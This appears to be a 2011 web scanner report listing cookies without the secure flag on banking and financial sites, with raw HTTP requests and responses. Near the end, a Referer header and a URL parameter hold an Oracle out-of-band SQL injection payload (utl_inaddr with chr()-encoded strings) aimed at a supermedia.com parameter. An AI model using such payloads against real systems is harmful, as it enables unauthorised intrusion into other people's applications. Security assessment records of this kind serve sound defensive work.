GET /consumertravel/travel.do?a=travel-offers&us_nu=subtab&inav=menu_travel_viewoffers HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
yut=172.17.12.125.48721296759884519; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yodlee_index.html HTTP/1.1 Host: easyview.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:04:44 GMT Vary: User-Agent Set-Cookie: yut=172.17.12.125.48721296759884519; path=/ Last-Modified: Tue, 19 Jan 2010 08:24:12 GMT ETag: "3a9d85-2a1b-4b556c2c" Accept-Ranges: bytes Content-Length: 10779 Connection: close Content-Type: text/html
<html> <head> <meta name=description content="EasyView enables consumers to aggregate, manage, and access all their personal accounts - bank balances, investments, bills, email, travel reservations, s ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1791168303; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regions/enes/24/_ HTTP/1.1 Host: espanol.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Thu, 03 Feb 2011 15:51:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Connection: close Set-Cookie: www.regions.com-ssl=R1791168303; path=/ Content-Type: text/html;charset=iso-8859-1 Content-Length: 2741
<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head>
rfaft2c1_.regions.com_%2F_wlf=TlNDX2Z5cXNmdHRzamhpdW1kLnNmaGpwb3QuZHBuLXdqcV9f?eqACuPgwQKiYA4fAAbwNJxQyR+gA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /icc HTTP/1.1 Host: expresstradelc.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://expresstradelc.regions.com/icc/">here</a></body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Thu, 03 Feb 2011 13:45:05 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington, District Of Columbia&P7=Original&P8=&P9=38.9069/-77.0284&P10=24902&P11=&P12=&searchtype=Web Search&optl1=1&backurl=http://www.bing.com:80/?FORM=FEEDTU Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU; expires=Thu, 03-Feb-2011 14:45:05 GMT; path=/ Set-Cookie: LNG=feedback.live.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: MSIDCookie=778b4fbd-2db4-4fa4-a996-44ac5969587d; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 522
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US& ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Thu, 03 Feb 2011 13:45:15 GMT Date: Thu, 03 Feb 2011 13:45:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:15 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/js/ad_login.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Mon, 31 Aug 2009 21:57:24 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Thu, 03 Feb 2011 20:47:26 GMT Date: Thu, 03 Feb 2011 14:16:14 GMT Content-Length: 9515 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:14 GMT; path=/; domain=.americanexpress.com
/** SWF Object 1.5 : Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.opensource.o ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/pz/pes_basic.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Mon, 29 Nov 2010 12:03:47 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Fri, 04 Feb 2011 06:53:10 GMT Date: Thu, 03 Feb 2011 14:16:16 GMT Content-Length: 18578 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com
/* Personalization Enterprise Service * * Standard Approach : JSON Integration * Created: Renjith Lal * Date: 04/02/2010 *--------------------------------------------------------------------- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/pz/pes_login.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Thu, 28 Oct 2010 21:43:44 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Thu, 03 Feb 2011 20:49:12 GMT Date: Thu, 03 Feb 2011 14:16:16 GMT Content-Length: 7866 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com
/* Personalization Enterprise Service * * Code below this comment is related to the Client Integrations for the PES JSON response . *----------------------------------------------------------- ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: itreasury.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: COOKIE-ITREASURY.REGIONSTEST.COM=R1009885090; path=/ Set-Cookie: ITREASURY2.REGIONS.COM=R3486410295; path=/ Date: Thu, 03 Feb 2011 15:51:13 GMT Server: IBM_HTTP_Server Last-Modified: Fri, 06 Nov 2009 15:20:43 GMT ETag: "18cc7e-ee-632508c0" Accept-Ranges: bytes Content-Length: 238 Cache-Control: private, no-cache, no-store, post-check=0, pre-check=0, no-cache="set-cookie,set-cookie2" Expires: Sat, 6 May 1995 12:00:00 GMT Connection: close Content-Type: text/html
<!--Configuration file needed for webserver to redirect to Login Screen when lazy url is entered--> <html> <head> <title>Login</title> <script language="javascript"> window.location="/wcmfd/wcmpw/Cust ...[SNIP]...
The following cookies were issued by the application and do not have the secure flag set:
v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
LABS_Cookie=2376211466.64288.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rapidalerts/ HTTP/1.1 Host: labs.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com Set-Cookie: JSESSIONID=D972FC3BF23E3E95BEC7A3C1F716FC0A; Path=/rapidalerts; Secure Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 13:45:18 GMT Connection: close Set-Cookie: LABS_Cookie=2376211466.64288.0000; path=/ Content-Length: 6311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/selfservice/main.do HTTP/1.1 Host: online.bbandt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found connection: close content-type: text/html; charset=iso-8859-1 date: Thu, 03 Feb 2011 14:10:48 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-old-content-length: 305 Set-Cookie: PD_STATEFUL_70873996-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/ Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /online/selfservice/main.do was not found on this ser ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/selfservice/main.do?flow= HTTP/1.1 Host: online.bbandt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found connection: close content-type: text/html; charset=iso-8859-1 date: Thu, 03 Feb 2011 14:10:49 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-old-content-length: 305 Set-Cookie: PD_STATEFUL_7092e99e-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/ Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /online/selfservice/main.do was not found on this ser ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /das/channel/enrollDisplay HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:45:25 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=CONS&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=o2JE22B0Api8bfU5lQAAAAAAA5lwAHR50dFYpTld0G3jevD4Cra98VywSRwUGu1UVqtRMSnXRugM1Ic=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:17:54 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=0256DD3E2F98102FBA68EF2D383024B5; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=nhGmx3xwk5gjzZG20xMtQOl6qUU=55 4N.WCv7z1Zp27CNLMkWZrcctgrr.2950501; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The following cookie was issued by the application and does not have the secure flag set:
BIGipServerPublic=1880363180.49556.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/gateway HTTP/1.1 Host: payroll.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=c38625c1a3aedba4074c3d8ad425.Public2; Path=/; Secure Content-Type: text/html; charset=iso-8859-1 Content-Length: 0 Date: Thu, 03 Feb 2011 15:51:13 GMT Connection: close Set-Cookie: BIGipServerPublic=1880363180.49556.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hsbcpb/ HTTP/1.1 Host: pfo.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Thu, 03 Feb 2011 19:14:49 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296760489.597571; path=/; expires=Sun, 31-Jan-2021 19:14:49 GMT Content-language: en-US Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML>
The following cookie was issued by the application and does not have the secure flag set:
BRANDID=PREMIER
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jsp/oao/relc/cashedge/oao_application_retrieve.jsp?homeid=99992052&BRANDID=PREMIER HTTP/1.1 Host: quickaccount.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script> function MM_goToURL() { //v3.0 var i, args=MM_goToURL.arguments; document.MM_returnValue = false; for (i=0; i<(args.length-1); i+=2) eval(a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/13041680/?cmd=file&file=visitorWantsToChat&site=13041680&byhref=1&AEPARAMS&SESSIONVAR!StaticButtonNameNoScript=Generic HTTP/1.1 Host: sales.liveperson.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HumanClickKEY=2662170475251338767; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickSiteContainerID_2489482=STANDALONE;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:47:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296740856:0; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net Set-Cookie: HumanClickKEY=4239242515931163064; path=/hc/13041680 Set-Cookie: HumanClickSiteContainerID_13041680=STANDALONE; path=/hc/13041680 Set-Cookie: LivePersonID=-16101423669632-1296740856:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net Set-Cookie: HumanClickCHATKEY=7675585467513136947; path=/hc/13041680; secure Content-Type: text/html Last-Modified: Thu, 03 Feb 2011 13:47:36 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 5641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: sslgypsy-test.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750407186-sslgypsy-test.superpages.com-7577407-636051; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:26:47 GMT; Path=/ Location: http://sslgypsy-test.superpages.com/yp.advanced.jsp? Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 0 Date: Thu, 03 Feb 2011 16:26:47 GMT Connection: close Set-Cookie: NSC_ttmhzqtz-443=ffffffff9482124945525d5f4f58455e445a4a421548;expires=Thu, 03-Feb-2011 16:28:47 GMT;path=/;secure
rfaft2c1_.regions.com_%2F_wlf=TlNDX3VwbGZvdC5zZmhqcG90LmRwbi13anFf?TxQcFo0NsG+CTkoDF7kyEhxxlOEA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tokens.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jaction/00asup_RetargetingSecure_1 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: redcated Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/html Expires: 0 Vary: Accept-Encoding P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296759635-11855865; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=82A8A851D01949528AD578CC9601958F; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Date: Thu, 03 Feb 2011 19:00:35 GMT Connection: close Content-Length: 485
function AT_tags(){ try{var tags = new Array(); var imgs = new Array(); tags = ['https://a248.e.akamai.net/img.redcated/images/pixel.gif','https://ad.bizo.com/pixel?id=175863&t=2','https ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.pv?blur=false&poll=60000&url=https%3A//www.supermedia.com/spportal/spportalFlow.do%3F_flowExecutionKey%3D%2527%257C%257C%28utl_inaddr.get_host_address%28%28select+chr%2895%29%257C%257Cchr%2833%29%257C%257Cchr%2864%29%257C%257Cchr%2851%29%257C%257Cchr%28100%29%257C%257Cchr%28105%29%257C%257Cchr%28108%29%257C%257Cchr%28101%29%257C%257Cchr%28109%29%257C%257Cchr%28109%29%257C%257Cchr%2897%29+from+DUAL%29%29%29%257C%257C%2527&pvid=1296759669758946057&wdid=798708614246318013&idid=2139287495442682134&cp=https&vr=Processing%20Error%20Title&1296759669434 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: vms.boldchat.com Connection: Keep-Alive Cache-Control: no-cache Cookie: bc-visitor-id=0=0
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" X-Boldcenter-PageViewID: 1296759669758946057 X-Boldcenter-VisitID: 9223372036839666059 Set-Cookie: bc-visitor-id=798708614246318013=3840678644403429768&0=0; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:00:36 GMT Set-Cookie: bc-visit-id=798708614246318013=9223372036839666059; domain=.boldchat.com; path=/ Content-Type: image/gif Connection: close Date: Thu, 03 Feb 2011 19:00:36 GMT Content-Length: 35
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:47:48 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296740868411065; path=/; expires=Sun, 07-Feb-16 13:47:48 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-284016 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HICServlet HTTP/1.1 Host: www.banking.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 16:35:29 GMT Content-type: text/html;charset=ISO-8859-1 Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296750929.438276; path=/; expires=Sun, 31-Jan-2021 16:35:29 GMT Surrogate-control: no-store Content-language: en-US Set-cookie: HSBCUSID=00013uF8pzmV9vu4OA6F5HlhYcO:15fcas229; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Thu, 03 Feb 2011 15:39:39 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=WypGP_b5c8mV_jNQmSsiR3IOaXISAk1KzDsKAUw2IAAL6AABqjMGBAAAAQAGBU1KzDsAP03; path=/; domain=.mystreetscape.com; expires=Fri, 03-Feb-2012 15:39:39 GMT Set-cookie: spc=121; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=4F87F0A2406FC4D216FAB75C56426E60; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d4acc3b0a014c3620000be80000aa33 Fscalleeid: ibweb121 Fselapsedtime: 10048 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/ Content-Length: 102267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
